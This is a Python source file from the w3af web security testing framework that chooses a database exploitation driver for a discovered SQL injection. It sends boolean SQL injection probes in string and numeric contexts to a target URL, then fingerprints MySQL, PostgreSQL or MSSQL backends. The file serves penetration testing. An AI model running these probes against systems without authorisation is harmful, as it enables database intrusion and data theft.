'''
dbDriverBuilder.py
Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
import core.controllers.outputManager as om

from plugins.attack.db.mysqlmap import MySQLMap as mysqlmap
from plugins.attack.db.postgresqlmap import PostgreSQLMap as postgresqlmap
from plugins.attack.db.mssqlservermap import MSSQLServerMap as mssqlservermap
#from plugins.attack.db.mysqlmap import db2 as db2

from core.controllers.w3afException import w3afException


class dbDriverBuilder:
    '''
    This class is a builder for database drivers.

    @author: Andres Riancho ( andres.riancho@gmail.com )
    '''
    def __init__( self , urlOpener, cmpFunction ):
        '''
        cmpFunction is the function to be used to compare two strings.
        '''
        self._urlOpener = urlOpener
        self._cmpFunction = cmpFunction

    def _getType( self, vuln ):
        '''
        Determine how to escape the SQL injection
        '''
        exploitDc = vuln.getDc()
        # Baseline request: its body is kept as the reference "error" response.
        exploitDc[ vuln.getVar() ] = "'z'z'z'"
        functionReference = getattr( self._urlOpener , vuln.getMethod() )
        errorResponse = functionReference( vuln.getURL(), str(exploitDc) )

        # Try each quoting context in turn; the first one whose response body
        # differs from the baseline is taken as the injection type.
        for escape, injectionType in [ ('\'','stringsingle') , ('"','stringdouble'), (' ','numeric')]:
            exploitDc[ vuln.getVar() ] = '1' + escape + ' AND ' + escape + '1' + escape + '=' + escape + '1'
            response = functionReference( vuln.getURL(), str(exploitDc) )
            if response.getBody() != errorResponse.getBody():
                vuln['type'] = injectionType
                om.out.debug('[INFO] The injection type is: ' + injectionType )
                return vuln

        om.out.error('Could not find SQL injection type.')
        return None

    def getDriverForVuln( self, vuln ):
        '''
        @return: A database driver for the vuln passed as parameter.
        '''
        if 'type' not in vuln:
            vuln = self._getType( vuln )
            if vuln is None:
                return None

        driverList = []
        driverList.append( mysqlmap( self._urlOpener, self._cmpFunction, vuln ) )
        driverList.append( postgresqlmap( self._urlOpener, self._cmpFunction, vuln ) )
        driverList.append( mssqlservermap( self._urlOpener, self._cmpFunction, vuln ) )
        #driverList.append( db2( self._urlOpener, vuln ) )

        # Return the first driver that recognises the backend DBMS.
        for driver in driverList:
            if driver.checkDbms():
                return driver

        return None